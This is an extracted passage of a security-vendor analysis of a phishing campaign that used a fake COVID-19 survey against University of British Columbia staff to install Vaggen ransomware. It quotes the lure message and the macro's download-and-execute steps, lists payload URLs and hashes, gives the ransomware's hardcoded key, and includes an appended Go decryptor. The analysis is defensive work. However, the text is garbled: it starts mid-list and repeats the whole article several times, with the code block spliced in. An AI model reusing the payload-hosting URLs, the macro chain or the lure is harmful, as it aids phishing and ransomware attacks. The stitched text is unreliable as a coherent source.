3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1763 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1764 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1765 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1766 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1767 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1768 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1769 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the gcm.Seal function.

The content of the output file (with .VAGGEN extension) is laid out as:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

(gcm.Seal itself appends the tag to the ciphertext, so the file is simply the nonce followed by the output of gcm.Seal.)

The hardcoded key "du_tar_mitt_hjart_mina_pengarna0" found inside the malware code is Swedish for "you take my heart my money"; the trailing 0 pads the string to the 32 bytes AES-256 requires. Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It's unclear at this point if the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
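As an added example (this is not code from the write-up above, nor the malware's own code), the following Go program decrypts a file in the .VAGGEN layout described in the Vaggen ransomware section: a 12-byte nonce, followed by the AES-256-GCM ciphertext and its 16-byte tag, all under the static 32-byte key recovered from the binary. The sealLikeVaggen helper only constructs a test fixture in that same layout so the decryptor can be exercised offline (crypto/rand stands in for the CryptGenRandom call the analysis mentions); the function names and the sample text are this example's own.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
)

// Layout of an encrypted .VAGGEN file, as described in the analysis:
//   [12-byte nonce][ciphertext][16-byte GCM tag]
// Go's gcm.Seal already appends the tag to the ciphertext, so the file body is
// simply nonce || Seal(plaintext).
const (
	nonceSize = 12
	tagSize   = 16
)

// VaggenKey is the 32-byte AES-256 key hardcoded in the sample (from the analysis).
var VaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

// DecryptVaggen recovers the plaintext of one encrypted file body. It fails
// closed on truncated input and on GCM tag mismatch (wrong key or damaged file)
// instead of emitting garbage, which matters when run over a whole directory.
func DecryptVaggen(key, blob []byte) ([]byte, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("key must be 32 bytes, got %d", len(key))
	}
	if len(blob) < nonceSize+tagSize {
		return nil, errors.New("file too short to hold a nonce and a GCM tag")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block) // 12-byte nonce, 16-byte tag by default
	if err != nil {
		return nil, err
	}
	nonce, sealed := blob[:nonceSize], blob[nonceSize:]
	plain, err := gcm.Open(nil, nonce, sealed, nil)
	if err != nil {
		return nil, fmt.Errorf("GCM authentication failed (wrong key or corrupted file): %w", err)
	}
	return plain, nil
}

// sealLikeVaggen builds a constructed test fixture in the same layout so the
// decryptor can be checked offline. It is part of this example only, not the
// malware's code; the nonce comes from crypto/rand here.
func sealLikeVaggen(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return append(nonce, gcm.Seal(nil, nonce, plaintext, nil)...), nil
}

func main() {
	sample := []byte("constructed sample document contents") // constructed input
	blob, err := sealLikeVaggen(VaggenKey, sample)
	if err != nil {
		panic(err)
	}
	got, err := DecryptVaggen(VaggenKey, blob)
	if err != nil {
		panic(err)
	}
	fmt.Printf("recovered %d bytes, match=%v\n", len(got), bytes.Equal(got, sample))

	// A single flipped tag byte must be rejected, not silently "decrypted".
	blob[len(blob)-1] ^= 0xff
	_, err = DecryptVaggen(VaggenKey, blob)
	fmt.Println("tampered file rejected:", err != nil)
}
```

Recovery is possible here only because the key is static and embedded in the binary, so every victim's files open with the same 32 bytes; the nonce, although random, is stored in clear at the start of each file and is not secret. Ransomware that generates a per-victim key and wraps it with an attacker-held public key cannot be undone this way, which is the distinction the "Unusually low ransom amount" section draws between this sample and professional operations.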
According to UBC, fewer than a hundred people within a specific department received the link to access the shared document.
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1806 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1807 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1808 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1809 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1810 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1811 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1812 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1813 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1814 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1815 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1816 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1817 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1818 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1819 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1820 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1821 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1822 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1823 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1824 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
